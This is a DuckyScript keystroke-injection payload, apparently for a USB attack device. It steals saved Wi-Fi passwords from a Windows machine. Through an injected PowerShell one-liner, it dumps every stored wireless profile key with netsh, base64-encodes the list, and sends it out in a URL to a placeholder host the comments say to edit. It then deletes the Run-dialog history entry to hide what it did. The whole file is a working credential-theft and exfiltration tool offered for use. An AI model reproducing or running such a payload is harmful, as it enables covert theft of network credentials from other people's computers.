REM                                                                    _..._       .-'''-.                 .-'''-.
REM                                                                 .-'_..._''.   '   _    \  .---.       '   _    \
REM /|                                                            .' .'      '.\/   /` '.   \ |   |.--. /   /` '.   \
REM ||    .-.          .-                                        / .'          .   |     \  ' |   ||__|.   |     \  '
REM ||     \ \        / /                               .-,.--. . '            |   '      |  '|   |.--.|   '      |  '
REM ||  __  \ \      / /                          __    |  .-. || |            \    \     / / |   ||  |\    \     / /
REM ||/'__ '.\ \    / /            .--------.  .:--.'.  | |  | || |             `.   ` ..' /  |   ||  | `.   ` ..' /
REM |:/`  '. '\ \  / /             |____    | / |   \ | | |  | |. '                '-...-'`   |   ||  |    '-...-'`
REM ||     | | \ `  /                  /   /  `" __ | | | |  '-  \ '.          .              |   ||  |
REM ||\    / '  \  /                 .'   /    .'.''| | | |       '. `._____.-'/              |   ||__|
REM |/\'..' /   / /                 /    /___ / /   | |_| |         `-.______ /               '---'
REM '  `'-'`|`-' /                 |         |\ \._,\ '/|_|                  `
REM          '..'                  |_________| `--'  `"

REM Steals wifi passwords (uptil win10, win11 needs admin for all passwords)
REM Exfills it via http://127.0.0.1 (edit this)
REM Cleans up last opened MRU listing ("powershell")
REM Press button to close MS Edge.

DELAY 1000
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 1000
ALTCODE $base64output=[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes(((netsh wlan show profiles|Select-String "All User Profile\s+:\s+(.+)$"|ForEach-Object{$_.Matches.Groups[1].Value})|ForEach-Object{ "Wifi:     $_`r`n";netsh wlan show profile name=$_ key=clear|Select-String "Key Content\s+:\s+(.+)$"|ForEach-Object{"Password: $($_.Matches.Groups[1].Value)`r`n"}})-join ""));Start-Process "microsoft-edge:http://127.0.0.1?secret=$base64output";$HKCU = [Microsoft.Win32.Registry]::CurrentUser; $RunMRU = 'Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'; $RunMRUKey = $HKCU.OpenSubKey($RunMRU, $true); if ($RunMRUKey -ne $null) { $values = $RunMRUKey.GetValueNames(); if ($values.Length -gt 0) { $lastValue = $values[$values.Length - 1]; $RunMRUKey.DeleteValue($lastValue)}}
ENTER
WAIT_FOR_BUTTON_PRESS
ALT F4
